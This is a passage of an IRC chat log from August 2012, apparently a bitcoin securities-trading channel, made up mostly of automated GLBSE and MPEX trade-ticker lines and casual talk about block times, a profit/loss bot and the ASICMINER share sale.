= 1.92 BTC [-] Aug 14 19:07:30 [GLBSE] [TEEK.USD] 5 @ 0.0815 = 0.4075 BTC [-] Aug 14 19:07:32 [GLBSE] [BITBOND] 10 @ 0.46 = 4.6 BTC [-] Aug 14 19:07:33 [GLBSE] [BITBOND] 10 @ 0.46 = 4.6 BTC [-] Aug 14 19:07:34 [GLBSE] [BITBOND] 6 @ 0.46 = 2.76 BTC [-] Aug 14 19:07:34 [GLBSE] [BITBOND] 3 @ 0.45 = 1.35 BTC [-] Aug 14 19:08:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 14 19:11:17 [GLBSE] [DMC] 30 @ 0.039 = 1.17 BTC [-] Aug 14 19:11:48 [GLBSE] [DMC] 20 @ 0.039 = 0.78 BTC [-] Aug 14 19:12:16 [GLBSE] [TYGRR.BOND-P] 30 @ 1.062 = 31.86 BTC [+] Aug 14 19:12:32 [GLBSE] [ASICMINER] 130 @ 0.1 = 13 BTC [+] Aug 14 19:15:46 [MPEX] [F.GIGA.ETF] 200 @ 0.00110882 = 0.2218 BTC [+] Aug 14 19:17:33 [GLBSE] [BDT] 2 @ 1.07989999 = 2.1598 BTC [+] Aug 14 19:18:03 [GLBSE] [TYGRR.BOND-PI] 30 @ 1.6 = 48 BTC [-] Aug 14 19:21:00 [GLBSE] [M.ETF] 10 @ 0.109 = 1.09 BTC [-] Aug 14 19:22:08 [GLBSE] [ASICMINER] 6 @ 0.1 = 0.6 BTC [+] Aug 14 19:22:19 [GLBSE] [BITCOINRS] 13 @ 0.045 = 0.585 BTC [-] Aug 14 19:24:22 [GLBSE] [DMC] 39 @ 0.039 = 1.521 BTC [-] Aug 14 19:24:59 [GLBSE] [YABMC] 3 @ 0.1151 = 0.3453 BTC [-] Aug 14 19:27:45 [GLBSE] [DMC] 40 @ 0.04 = 1.6 BTC [+] Aug 14 19:29:56 [GLBSE] [BTCMC] 4 @ 0.78979 = 3.1592 BTC [+] Aug 14 19:38:29 [MPEX] [S.MPOE] 28300 @ 0.00037815 = 10.7016 BTC [-] Aug 14 19:41:50 [GLBSE] [BITCOINMINV] 10 @ 0.124 = 1.24 BTC [+] Aug 14 19:41:51 [GLBSE] [BITCOINMINV] 10 @ 0.12499 = 1.2499 BTC [+] Aug 14 19:46:13 [GLBSE] [FPGAMINING] 1 @ 0.95 BTC [-] Aug 14 19:49:22 [GLBSE] [ASICMINER] 1650 @ 0.1 = 165 BTC [+] Aug 14 19:49:32 [MPEX] [S.MPOE] 9871 @ 0.00037815 = 3.7327 BTC [-] Aug 14 19:49:34 [MPEX] [S.MPOE] 9276 @ 0.0003803 = 3.5277 BTC [+] Aug 14 19:49:58 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 19:53:53 [GLBSE] [BBBB] 1000 @ 0.00028 = 0.28 BTC [+] Aug 14 19:59:25 [GLBSE] [DMC] 3 @ 0.04 = 0.12 BTC [+] Aug 14 20:05:50 [GLBSE] [ASICMINER] 34 @ 0.1 = 3.4 BTC [+] Aug 14 20:14:31 [GLBSE] [GIGAMINING] 2 @ 1.1279 = 2.2558 BTC [-] Aug 14 20:14:33 [GLBSE] [GIGAMINING] 14 @ 1.128 = 15.792 BTC [+] Aug 14 20:14:34 [GLBSE] [GIGAMINING] 66 @ 1.13849999 = 75.141 BTC [+] Aug 14 20:14:35 [GLBSE] [GIGAMINING] 18 @ 1.1385 = 20.493 BTC [+] Aug 14 20:18:17 [GLBSE] [ASICMINER] 40 @ 0.1 = 4 BTC [+] Aug 14 20:19:13 [GLBSE] [BDK.BND] 1 @ 0.10274699 BTC [-] Aug 14 20:20:22 ;;tslb Aug 14 20:20:24 Time since last block: 42 minutes and 39 seconds Aug 14 20:20:30 jesus fuck... Aug 14 20:21:27 heh Aug 14 20:21:33 [GLBSE] [ASICMINER] 42 @ 0.1 = 4.2 BTC [+] Aug 14 20:24:12 ;;tslb Aug 14 20:24:13 Time since last block: 46 minutes and 29 seconds Aug 14 20:24:55 just ask ;;ttnb Aug 14 20:25:17 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0619 = 4.2476 BTC [-] Aug 14 20:25:19 [GLBSE] [BTCMC] 1 @ 0.7101 BTC [-] Aug 14 20:27:08 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 20:27:58 Chaaaang-Noi: did that tangible cryptography site work out for you? Aug 14 20:28:12 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [+] Aug 14 20:28:48 they said it will go out today and i will get it tomorrow Aug 14 20:28:50 so far so good Aug 14 20:28:57 but its death and taxes so i kinda trust it Aug 14 20:29:14 [GLBSE] [ASICMINER] 6 @ 0.1 = 0.6 BTC [+] Aug 14 20:29:16 is that who tangible cryptography is? Aug 14 20:29:42 i suspected, but knever knew Aug 14 20:29:45 [GLBSE] [DMC] 7 @ 0.0389 = 0.2723 BTC [-] Aug 14 20:30:08 [MPEX] [S.MPOE] 12424 @ 0.0003803 = 4.7248 BTC [+] Aug 14 20:32:48 [GLBSE] [TYGRR.BOND-PI] 5 @ 1.55 = 7.75 BTC [-] Aug 14 20:33:59 ;;tslb Aug 14 20:34:00 Time since last block: 7 minutes and 39 seconds Aug 14 20:34:04 i dont know, i just assumed Aug 14 20:34:12 [MPEX] [S.MPOE] 51000 @ 0.00038825 = 19.8008 BTC [+] Aug 14 20:36:23 [MPEX] [F.GIGA.ETF] 2976 @ 0.00110882 = 3.2998 BTC [+] Aug 14 20:36:25 [MPEX] [F.GIGA.ETF] 12924 @ 0.00111045 = 14.3515 BTC [+] Aug 14 20:38:58 [GLBSE] [FUTUREFUND] 1000 @ 0.00011 = 0.11 BTC [-] Aug 14 20:39:26 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [-] Aug 14 20:39:27 [GLBSE] [FPGAMINING] 1 @ 0.89 BTC [-] Aug 14 20:39:29 [GLBSE] [FPGAMINING] 2 @ 0.87 = 1.74 BTC [-] Aug 14 20:39:30 [GLBSE] [FPGAMINING] 1 @ 0.86 BTC [-] Aug 14 20:39:30 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.55 BTC [-] Aug 14 20:41:52 [GLBSE] [FUTUREFUND] 9 @ 0.0001 = 0.0009 BTC [-] Aug 14 20:41:53 [GLBSE] [FUTUREFUND] 12 @ 0.0001 = 0.0012 BTC [-] Aug 14 20:42:03 [GLBSE] [ASICMINER] 8 @ 0.1 = 0.8 BTC [+] Aug 14 20:44:45 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1002 BTC [+] Aug 14 20:47:29 [GLBSE] [BTCMC] 4 @ 0.7101 = 2.8404 BTC [-] Aug 14 20:48:45 [GLBSE] [PPT.A] 3 @ 1.167 = 3.501 BTC [+] Aug 14 20:52:36 ;;tslb Aug 14 20:52:37 Time since last block: 26 minutes and 15 seconds Aug 14 20:52:46 wtf is up with blocks today!!! Aug 14 20:54:30 According to bitcoincharts, nothing (Blocks/hour 6.40) Aug 14 20:54:39 [GLBSE] [MERGEDMINING] 77 @ 0.075 = 5.775 BTC [-] Aug 14 20:57:14 well last 1.5 hours then :) Aug 14 20:57:24 ;;tslb Aug 14 20:57:28 Time since last block: 3 minutes and 52 seconds Aug 14 20:57:49 i see part of this is someonedid not pay a fee so its not being added, oh fail... Aug 14 21:04:56 [GLBSE] [ASICMINER] 270 @ 0.1 = 27 BTC [+] Aug 14 21:06:43 [GLBSE] [DMC] 100 @ 0.0388 = 3.88 BTC [-] Aug 14 21:07:09 [GLBSE] [ASICMINER] 18 @ 0.1 = 1.8 BTC [+] Aug 14 21:08:16 [MPEX] [F.GIGA.ETF] 1415 @ 0.00111045 = 1.5713 BTC [+] Aug 14 21:08:17 [MPEX] [F.GIGA.ETF] 3985 @ 0.00111464 = 4.4418 BTC [+] Aug 14 21:21:57 [GLBSE] [ASICMINER] 157 @ 0.1 = 15.7 BTC [+] Aug 14 21:26:42 [MPEX] [F.GIGA.ETF] 13 @ 0.00111464 = 0.0145 BTC [+] Aug 14 21:26:44 [MPEX] [F.GIGA.ETF] 12990 @ 0.00111779 = 14.5201 BTC [+] Aug 14 21:26:44 [MPEX] [F.GIGA.ETF] 1997 @ 0.00111784 = 2.2323 BTC [+] Aug 14 21:26:46 [GLBSE] [TYGRR.BOND-PI] 9 @ 1.55 = 13.95 BTC [-] Aug 14 21:27:44 [GLBSE] [SYNERGY] 3 @ 0.172 = 0.516 BTC [-] Aug 14 21:27:45 [GLBSE] [SYNERGY] 2 @ 0.171 = 0.342 BTC [-] Aug 14 21:35:45 [GLBSE] [FPGAMINING] 3 @ 0.949 = 2.847 BTC [+] Aug 14 21:35:47 [GLBSE] [FPGAMINING] 1 @ 0.95 BTC [+] Aug 14 21:35:57 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.25 BTC [+] Aug 14 21:38:57 [GLBSE] [ASICMINER] 420 @ 0.1 = 42 BTC [+] Aug 14 21:40:12 [GLBSE] [FOO.PPPPT] 2 @ 1.0221 = 2.0442 BTC [-] Aug 14 21:40:14 [GLBSE] [FOO.PPPPT] 14 @ 1.022 = 14.308 BTC [-] Aug 14 21:40:15 [GLBSE] [FOO.PPPPT] 4 @ 1.02121 = 4.0848 BTC [-] Aug 14 21:42:23 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Aug 14 21:42:47 [GLBSE] [BTCMC] 6 @ 0.7499 = 4.4994 BTC [+] Aug 14 21:42:49 [GLBSE] [BTCMC] 11 @ 0.75 = 8.25 BTC [+] Aug 14 21:43:04 [MPEX] [S.BVPS] 750 @ 0.00383417 = 2.8756 BTC [-] Aug 14 21:43:06 [MPEX] [S.BVPS] 200 @ 0.003828 = 0.7656 BTC [-] Aug 14 21:43:30 [GLBSE] [DMC] 50 @ 0.0388 = 1.94 BTC [-] Aug 14 21:43:34 [GLBSE] [BFLS.RIG] 5 @ 0.96 = 4.8 BTC [-] Aug 14 21:43:47 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Aug 14 21:43:53 [GLBSE] [ASICMINER] 1250 @ 0.1 = 125 BTC [+] Aug 14 21:44:06 [GLBSE] [TYGRR.BOND-P] 2 @ 1.0619 = 2.1238 BTC [-] Aug 14 21:44:13 [MPEX] [S.MPOE] 6600 @ 0.00038825 = 2.5625 BTC [+] Aug 14 21:44:15 [MPEX] [S.MPOE] 15381 @ 0.0003883 = 5.9724 BTC [+] Aug 14 21:44:16 [MPEX] [S.MPOE] 11919 @ 0.00039017 = 4.6504 BTC [+] Aug 14 21:44:27 [GLBSE] [DMC] 50 @ 0.0388 = 1.94 BTC [-] Aug 14 21:45:19 [GLBSE] [FPGA.CONTRACT] 3 @ 0.1679 = 0.5037 BTC [-] Aug 14 21:46:13 [GLBSE] [BFLS] 31 @ 1 = 31 BTC [+] Aug 14 21:46:29 [GLBSE] [YABMC] 2 @ 0.12179999 = 0.2436 BTC [+] Aug 14 21:47:32 [GLBSE] [TYGRR.BOND-P] 1 @ 1.0619 BTC [-] Aug 14 21:47:35 [GLBSE] [BFLS] 4 @ 1.1 = 4.4 BTC [+] Aug 14 21:47:54 [GLBSE] [DMC] 28 @ 0.0388 = 1.0864 BTC [-] Aug 14 21:49:28 [GLBSE] [M.ETF] 10 @ 0.104 = 1.04 BTC [-] Aug 14 21:49:30 [GLBSE] [BFLS] 2 @ 1.133 = 2.266 BTC [+] Aug 14 21:49:32 [GLBSE] [BFLS] 7 @ 1.133 = 7.931 BTC [+] Aug 14 21:49:36 [GLBSE] [PPT.A] 66 @ 1.167 = 77.022 BTC [+] Aug 14 21:49:59 [GLBSE] [TYGRR.BOND-P] 2 @ 1.0619 = 2.1238 BTC [-] Aug 14 21:50:36 [GLBSE] [NASTY] 6 @ 0.4999 = 2.9994 BTC [-] Aug 14 21:50:37 [GLBSE] [NASTY] 3 @ 0.5 = 1.5 BTC [+] Aug 14 21:50:53 [GLBSE] [BFLS] 2 @ 1.133 = 2.266 BTC [+] Aug 14 21:52:16 [GLBSE] [BFLS] 8 @ 1.249 = 9.992 BTC [+] Aug 14 21:53:07 [GLBSE] [DMC] 404 @ 0.0388 = 15.6752 BTC [-] Aug 14 21:53:09 [GLBSE] [DMC] 13 @ 0.0389 = 0.5057 BTC [+] Aug 14 21:53:10 [GLBSE] [DMC] 6 @ 0.039 = 0.234 BTC [+] Aug 14 21:53:11 [GLBSE] [DMC] 100 @ 0.0399 = 3.99 BTC [+] Aug 14 21:53:12 [GLBSE] [DMC] 177 @ 0.04 = 7.08 BTC [+] Aug 14 21:53:54 [GLBSE] [FPGA.CONTRACT] 1 @ 0.1111 BTC [-] Aug 14 21:53:56 [GLBSE] [BFLS] 1 @ 1.25 BTC [+] Aug 14 21:54:36 [GLBSE] [BFLS] 1 @ 2 BTC [+] Aug 14 21:55:26 [GLBSE] [DMC] 28 @ 0.04 = 1.12 BTC [+] Aug 14 21:55:36 [GLBSE] [TYGRR.BOND-P] 3 @ 1.0619 = 3.1857 BTC [-] Aug 14 21:55:40 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0301 = 4.1204 BTC [-] Aug 14 21:55:41 [GLBSE] [TYGRR.BOND-P] 9 @ 1.03 = 9.27 BTC [-] Aug 14 21:55:43 [GLBSE] [TYGRR.BOND-P] 26 @ 1.02 = 26.52 BTC [-] Aug 14 21:55:44 [GLBSE] [TYGRR.BOND-P] 2 @ 1.02 = 2.04 BTC [-] Aug 14 21:55:45 [GLBSE] [TYGRR.BOND-P] 5 @ 1 = 5 BTC [-] Aug 14 21:55:45 [GLBSE] [TYGRR.BOND-P] 4 @ 1 = 4 BTC [-] Aug 14 21:55:47 [GLBSE] [TYGRR.BOND-P] 51 @ 1 = 51 BTC [-] Aug 14 21:57:38 mircea_popescu: https://bitcointalk.org/index.php?topic=67535.msg1099694#msg1099694 Aug 14 21:57:51 it's the MPOE ETF financial report Aug 14 21:58:02 i know you like to see 'em :) Aug 14 21:59:10 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9905 BTC [-] Aug 14 21:59:11 [GLBSE] [TYGRR.BOND-P] 10 @ 0.9901 = 9.901 BTC [-] Aug 14 21:59:13 [GLBSE] [TYGRR.BOND-P] 20 @ 0.99 = 19.8 BTC [-] Aug 14 21:59:18 [GLBSE] [TYGRR.BOND-P] 8 @ 0.99 = 7.92 BTC [-] Aug 14 21:59:40 [GLBSE] [TYGRR.BOND-PI] 16 @ 1.55 = 24.8 BTC [-] Aug 14 22:01:19 [GLBSE] [FOO.PPPPT] 4 @ 1.04 = 4.16 BTC [+] Aug 14 22:02:52 [GLBSE] [TYGRR.BOND-PI] 18 @ 1.55 = 27.9 BTC [-] Aug 14 22:03:28 [MPEX] [S.BVPS] 600 @ 0.00384 = 2.304 BTC [+] Aug 14 22:03:47 [GLBSE] [PUREMINING] 2 @ 0.154398 = 0.3088 BTC [-] Aug 14 22:03:49 [GLBSE] [HYDRO.BONDS] 2 @ 1.4999 = 2.9998 BTC [-] Aug 14 22:03:59 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.55 BTC [-] Aug 14 22:04:03 [MPEX] [S.MPOE] 2900 @ 0.0003883 = 1.1261 BTC [-] Aug 14 22:04:05 [MPEX] [S.MPOE] 8281 @ 0.00039017 = 3.231 BTC [+] Aug 14 22:04:06 [MPEX] [S.MPOE] 16016 @ 0.00039254 = 6.2869 BTC [+] Aug 14 22:04:07 [MPEX] [S.MPOE] 32203 @ 0.00039267 = 12.6452 BTC [+] Aug 14 22:05:07 [GLBSE] [TYGRR.BOND-P] 2 @ 0.99 = 1.98 BTC [-] Aug 14 22:05:54 [GLBSE] [ASICMINER] 15 @ 0.1 = 1.5 BTC [+] Aug 14 22:07:13 [MPEX] [S.MPOE] 23576 @ 0.00038815 = 9.151 BTC [-] Aug 14 22:07:15 [MPEX] [S.MPOE] 11559 @ 0.00038456 = 4.4451 BTC [-] Aug 14 22:07:37 [GLBSE] [ASICMINER] 150 @ 0.1 = 15 BTC [+] Aug 14 22:10:01 [GLBSE] [NYAN.B] 12 @ 1 = 12 BTC [+] Aug 14 22:11:04 [GLBSE] [DMC] 300 @ 0.021 = 6.3 BTC [-] Aug 14 22:11:48 [GLBSE] [ASICMINER] 60 @ 0.1 = 6 BTC [+] Aug 14 22:13:21 [GLBSE] [JTME] 3 @ 0.92 = 2.76 BTC [-] Aug 14 22:13:49 [GLBSE] [PPT.E] 1 @ 0.199 BTC [-] Aug 14 22:14:36 [GLBSE] [JLP-BMD] 8 @ 0.0897 = 0.7176 BTC [+] Aug 14 22:14:37 [GLBSE] [JLP-BMD] 20 @ 0.0898 = 1.796 BTC [+] Aug 14 22:14:38 [GLBSE] [ASICMINER] 22 @ 0.1 = 2.2 BTC [+] Aug 14 22:16:26 [GLBSE] [DMC] 25 @ 0.0222 = 0.555 BTC [+] Aug 14 22:16:27 [GLBSE] [DMC] 175 @ 0.021 = 3.675 BTC [-] Aug 14 22:17:19 how low can it go Aug 14 22:18:10 [GLBSE] [YABMC] 9 @ 0.12179999 = 1.0962 BTC [+] Aug 14 22:18:16 uhuh Aug 14 22:18:42 !ticker dmc Aug 14 22:18:45 [GLBSE:DMC] [Bid: 0.021] [Ask: 0.0398] [Spread: 0.0188] [Last: 0.021] [24hVol: 237] [7dAvg: 0.06622255] Aug 14 22:18:54 [GLBSE] [PUREMINING] 1 @ 0.154398 BTC [-] Aug 14 22:19:27 [GLBSE] [M.ETF] 10 @ 0.09801 = 0.9801 BTC [-] Aug 14 22:19:49 [GLBSE] [ASICMINER] 1000 @ 0.1 = 100 BTC [+] Aug 14 22:20:06 [GLBSE] [ASICMINER] 1000 @ 0.1 = 100 BTC [+] Aug 14 22:21:08 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC [+] Aug 14 22:22:54 [GLBSE] [YABMC] 1 @ 0.12179999 BTC [+] Aug 14 22:23:34 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Aug 14 22:24:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.99 BTC [-] Aug 14 22:25:54 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC [+] Aug 14 22:27:14 [GLBSE] [ASICMINER] 9 @ 0.1 = 0.9 BTC [+] Aug 14 22:27:24 [GLBSE] [BITCOINMINV] 20 @ 0.124 = 2.48 BTC [-] Aug 14 22:27:25 [GLBSE] [BITCOINMINV] 5 @ 0.124999 = 0.625 BTC [+] Aug 14 22:28:03 [GLBSE] [TYGRR.BOND-P] 2 @ 0.99 = 1.98 BTC [-] Aug 14 22:28:22 [GLBSE] [TYGRR.BOND-P] 10 @ 0.99 = 9.9 BTC [-] Aug 14 22:28:27 [GLBSE] [BDT] 3 @ 1.07 = 3.21 BTC [-] Aug 14 22:28:29 [GLBSE] [BDT] 1 @ 1.066 BTC [-] Aug 14 22:28:30 [GLBSE] [BDT] 3 @ 1.0651 = 3.1953 BTC [-] Aug 14 22:28:31 [GLBSE] [BDT] 5 @ 1.065 = 5.325 BTC [-] Aug 14 22:28:38 [GLBSE] [YARR] 3 @ 1.46 = 4.38 BTC [-] Aug 14 22:28:40 [GLBSE] [YARR] 3 @ 1.45 = 4.35 BTC [-] Aug 14 22:28:41 [GLBSE] [TYGRR.BOND-P] 66 @ 0.99 = 65.34 BTC [-] Aug 14 22:30:06 [GLBSE] [BIB.PIRATE] 4 @ 1.01 = 4.04 BTC [-] Aug 14 22:30:13 [GLBSE] [JTME] 4 @ 0.92 = 3.68 BTC [-] Aug 14 22:30:42 [GLBSE] [BIF.BTCST.PPT] 1 @ 1.04 BTC [-] Aug 14 22:30:44 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 22:30:57 [GLBSE] [HYDRO.BONDS] 1 @ 1.4999 BTC [-] Aug 14 22:30:58 [GLBSE] [HYDRO.BONDS] 7 @ 1.5 = 10.5 BTC [+] Aug 14 22:31:26 [GLBSE] [DMC] 150 @ 0.02101 = 3.1515 BTC [+] Aug 14 22:31:28 [GLBSE] [DMC] 25 @ 0.021 = 0.525 BTC [-] Aug 14 22:31:29 [GLBSE] [DMC] 10 @ 0.02 = 0.2 BTC [-] Aug 14 22:32:00 [GLBSE] [ASICMINER] 36 @ 0.1 = 3.6 BTC [+] Aug 14 22:32:09 [GLBSE] [ASICMINER] 35 @ 0.1 = 3.5 BTC [+] Aug 14 22:34:25 lol at dmc .02 Aug 14 22:34:34 how many people bought at 1 btc? Aug 14 22:34:34 !pl dmc Aug 14 22:34:35 !pl [@] [] Aug 14 22:34:48 [GLBSE] [007] 3 @ 0.101 = 0.303 BTC [-] Aug 14 22:35:02 for 1 Aug 14 22:35:03 !pl dmc 1 Aug 14 22:35:04 !pl dmc 1 Aug 14 22:35:04 Requesting data from GLBSE (might take a while). Aug 14 22:35:09 hehe Aug 14 22:35:15 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.02 BTC. Capital gain: -0.98 BTC. Total: -0.95364186 BTC. (-95.4%) Aug 14 22:35:15 [GLBSE] [ASICMINER] 25 @ 0.1 = 2.5 BTC [+] Aug 14 22:35:16 Requesting data from GLBSE (might take a while). Aug 14 22:35:19 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.02 BTC. Capital gain: -0.98 BTC. Total: -0.95364186 BTC. (-95.4%) Aug 14 22:35:19 [GLBSE] [YABMC] 6 @ 0.12179999 = 0.7308 BTC [+] Aug 14 22:35:36 does that account for dividends? Aug 14 22:35:41 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 14 22:35:44 paid are the dividends Aug 14 22:35:52 i should've figured Aug 14 22:35:54 capital gain is w/o dividends Aug 14 22:35:58 total is with Aug 14 22:36:11 percentage is total Aug 14 22:36:34 i had one share, the first one bought, then i sold it at .666 for the lulz i bet i did better than most lol Aug 14 22:36:42 !pl MPOE.ETF 100@.1 2012-03-08 Aug 14 22:36:43 Requesting data from GLBSE (might take a while). Aug 14 22:36:46 MPOE.ETF [100@0.1BTC] (since: 2012-03-08) paid: 0.852236 BTC. Last price: 1.5 BTC. Capital gain: 14 BTC. Total: 140.852236 BTC. (1408.5%) Aug 14 22:36:49 i made a swap profit :p Aug 14 22:38:21 hmm Aug 14 22:38:40 !pl ss 10@1 2012-04-01 Aug 14 22:38:41 Requesting data from GLBSE (might take a while). Aug 14 22:38:48 SS [10@1BTC] (since: 2012-04-01) paid: 4.4535409 BTC. Last price: 1.9 BTC. Capital gain: 9 BTC. Total: 13.4535409 BTC. (134.5%) Aug 14 22:39:29 [GLBSE] [DMC] 16 @ 0.02 = 0.32 BTC [-] Aug 14 22:40:26 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [+] Aug 14 22:40:47 [GLBSE] [OBSI.1MHS] 30 @ 0.051 = 1.53 BTC [+] Aug 14 22:40:53 [GLBSE] [ASICMINER] 100 @ 0.1 = 10 BTC [+] Aug 14 22:41:13 [GLBSE] [ASICMINER] 15 @ 0.1 = 1.5 BTC [+] Aug 14 22:41:14 21:36.39 ( @assbot ) MPOE.ETF [100@0.1BTC] (since: 2012-03-08) paid: 0.852236 BTC. Last price: 1.5 BTC. Capital gain: 14 BTC. Total: 140.852236 BTC. (1408.5%) Aug 14 22:41:18 this is wrong isnt it Aug 14 22:42:09 [GLBSE] [OBSI.HRPT] 2 @ 0.101 = 0.202 BTC [+] Aug 14 22:42:22 !pl MPOE.ETF .1 2012-03-08 Aug 14 22:42:22 Requesting data from GLBSE (might take a while). Aug 14 22:42:24 MPOE.ETF [1@0.1BTC] (since: 2012-03-08) paid: 0.00852236 BTC. Last price: 1.5 BTC. Capital gain: 1.4 BTC. Total: 1.40852236 BTC. (1408.5%) Aug 14 22:43:11 [GLBSE] [FOO.PPPPT] 1 @ 1.02121 BTC [-] Aug 14 22:43:13 [GLBSE] [FOO.PPPPT] 4 @ 1.02021 = 4.0808 BTC [-] Aug 14 22:43:14 [GLBSE] [FOO.PPPPT] 1 @ 1.02000001 BTC [-] Aug 14 22:43:15 [GLBSE] [FOO.PPPPT] 8 @ 1.0102 = 8.0816 BTC [-] Aug 14 22:43:49 [GLBSE] [BIB.PIRATE] 2 @ 1.005 = 2.01 BTC [-] Aug 14 22:43:53 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 22:45:38 [MPEX] [F.GIGA.ETF] 10533 @ 0.00111784 = 11.7742 BTC [+] Aug 14 22:46:16 [GLBSE] [TYGRR.BOND-P] 10 @ 0.9999999 = 10 BTC [+] Aug 14 22:47:10 [GLBSE] [CIUCIU.BOND] 2 @ 0.095 = 0.19 BTC [-] Aug 14 22:48:10 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 22:50:40 !pl MPOE.ETF 0.1 2012-03-08 Aug 14 22:50:41 Requesting data from GLBSE (might take a while). Aug 14 22:50:53 MPOE.ETF [1@0.1BTC] (since: 2012-03-08) paid: 0.00852236 BTC. Last price: 1.5 BTC. Capital gain: 1.4 BTC. Total: 1.40852236 BTC. (1408.5%) Aug 14 22:50:54 [MPEX] [F.GIGA.ETF] 12100 @ 0.00110467 = 13.3665 BTC [-] Aug 14 22:51:08 !pl MPOE.ETF 100@0.1 2012-03-08 Aug 14 22:51:09 Requesting data from GLBSE (might take a while). Aug 14 22:51:18 MPOE.ETF [100@0.1BTC] (since: 2012-03-08) paid: 0.852236 BTC. Last price: 1.5 BTC. Capital gain: 14 BTC. Total: 140.852236 BTC. (1408.5%) Aug 14 22:51:25 hrm Aug 14 22:52:00 did 198000 ASICMINER shares sell? Aug 14 22:52:28 yep, almost all gone Aug 14 22:52:43 [GLBSE] [ASICMINER] 150 @ 0.1 = 15 BTC [+] Aug 14 22:52:50 [GLBSE] [PPT.E] 7 @ 1.21 = 8.47 BTC [+] Aug 14 22:53:07 !pl MPOE.ETF 100@.1 2012-03-08 Aug 14 22:53:08 Requesting data from GLBSE (might take a while). Aug 14 22:53:17 MPOE.ETF [100@0.1BTC] (since: 2012-03-08) paid: 0.852236 BTC. Last price: 1.5 BTC. Capital gain: 140 BTC. Total: 140.852236 BTC. (1408.5%) Aug 14 22:53:28 [GLBSE] [GIPPT] 1 @ 1.193 BTC [-] Aug 14 22:53:29 [GLBSE] [GIPPT] 5 @ 1.12 = 5.6 BTC [-] Aug 14 22:53:34 no Aug 14 22:53:38 eh Aug 14 22:53:43 now its less buggy Aug 14 22:53:59 [MPEX] [S.MPOE] 5000 @ 0.00038563 = 1.9282 BTC [+] Aug 14 22:54:01 [MPEX] [S.MPOE] 9400 @ 0.00039267 = 3.6911 BTC [+] Aug 14 23:00:23 !pl gigamining 1 Aug 14 23:00:23 Requesting data from GLBSE (might take a while). Aug 14 23:00:46 GIGAMINING [1@1BTC] paid: 0.38322596 BTC. Last price: 1.1385 BTC. Capital gain: 0.1385 BTC. Total: 0.52172596 BTC. (52.2%) Aug 14 23:01:14 dub i have been buying my share of asicminer :) Aug 14 23:01:38 !ticker asicminer Aug 14 23:02:22 [GLBSE:ASICMINER] [Bid: 0.093] [Ask: 0.1] [Spread: 0.007] [Last: 0.1] [24hVol: 1] [7dAvg: 0.09999563] Aug 14 23:03:56 why is assbot so quiet? Aug 14 23:04:25 24hour vol 1? lol Aug 14 23:04:33 i bought 3000 shares in the last 24 hours Aug 14 23:08:27 good point Aug 14 23:08:40 !ticker asicminer Aug 14 23:08:43 [GLBSE:ASICMINER] [Bid: 0.093] [Ask: 0.1] [Spread: 0.007] [Last: 0.1] [24hVol: 1,341.6] [7dAvg: 0.09999572] Aug 14 23:09:11 better. Aug 14 23:09:47 i still bought more than that Aug 14 23:09:58 its btc Aug 14 23:10:06 not shares Aug 14 23:10:46 so ~300btc is yours from 1300 Aug 14 23:11:35 ahhh Aug 14 23:11:38 okay :) Aug 14 23:11:48 i did not know volume was btc, i assumed shares Aug 14 23:11:49 thanks Aug 14 23:14:21 [MPEX] [F.GIGA.ETF] 889 @ 0.00111784 = 0.9938 BTC [+] Aug 14 23:14:23 [MPEX] [F.GIGA.ETF] 2211 @ 0.00111789 = 2.4717 BTC [+] Aug 14 23:16:36 ASICMINER sold out ;) and assbot didn't notice :-/ Aug 14 23:19:30 Yep ASICMINER was selling mHash at around 0.001/mHash Aug 14 23:20:11 thats why people flipping DMC for 0.04 will be crying soon Aug 14 23:20:39 https://twitter.com/glbse Aug 14 23:20:46 nothing here for past 27minutes Aug 14 23:21:56 usagi: I'm selling mine for 0.01/MH :) no swapping, only cash Aug 14 23:21:56 maybe ask was retracted? Aug 14 23:22:18 no, i bought all remaining Aug 14 23:22:28 ah strange Aug 14 23:22:38 blame it on twitter or glbse Aug 14 23:22:43 :p Aug 14 23:23:08 if in doubt, it's glbse ;) Aug 14 23:23:15 heh Aug 14 23:23:38 and i just sent some btc to get some a few min Aug 14 23:23:45 before you bought all the rest Aug 14 23:23:49 :) Aug 14 23:24:34 yeah i sent in more btc to get more lol Aug 14 23:24:38 oh well Aug 14 23:24:59 ah, you took my shares... let's see, ask is at 0.4 Aug 14 23:25:57 .4 seems fair Aug 14 23:26:03 Goat, you didn't bulk-order? Aug 14 23:26:15 iv been traveling Aug 14 23:26:20 i just found out about this Aug 14 23:26:26 travel is bad. Aug 14 23:26:30 i should have i guess Aug 14 23:26:35 should be still some 10k available, ask friedcat Aug 14 23:28:27 yeah i dont like to travel but it not so good just sitting in front of a computer all the time either lol Aug 14 23:31:45 sure it is better to play poker in vegas than following irc channels all day long. but we small folks need to earn some coins first before we can gamble them away ;) Aug 14 23:34:29 [MPEX] [F.GIGA.ETF] 2100 @ 0.00110467 = 2.3198 BTC [-] Aug 14 23:34:31 [MPEX] [F.GIGA.ETF] 2000 @ 0.00109049 = 2.181 BTC [-] Aug 14 23:37:12 [MPEX] 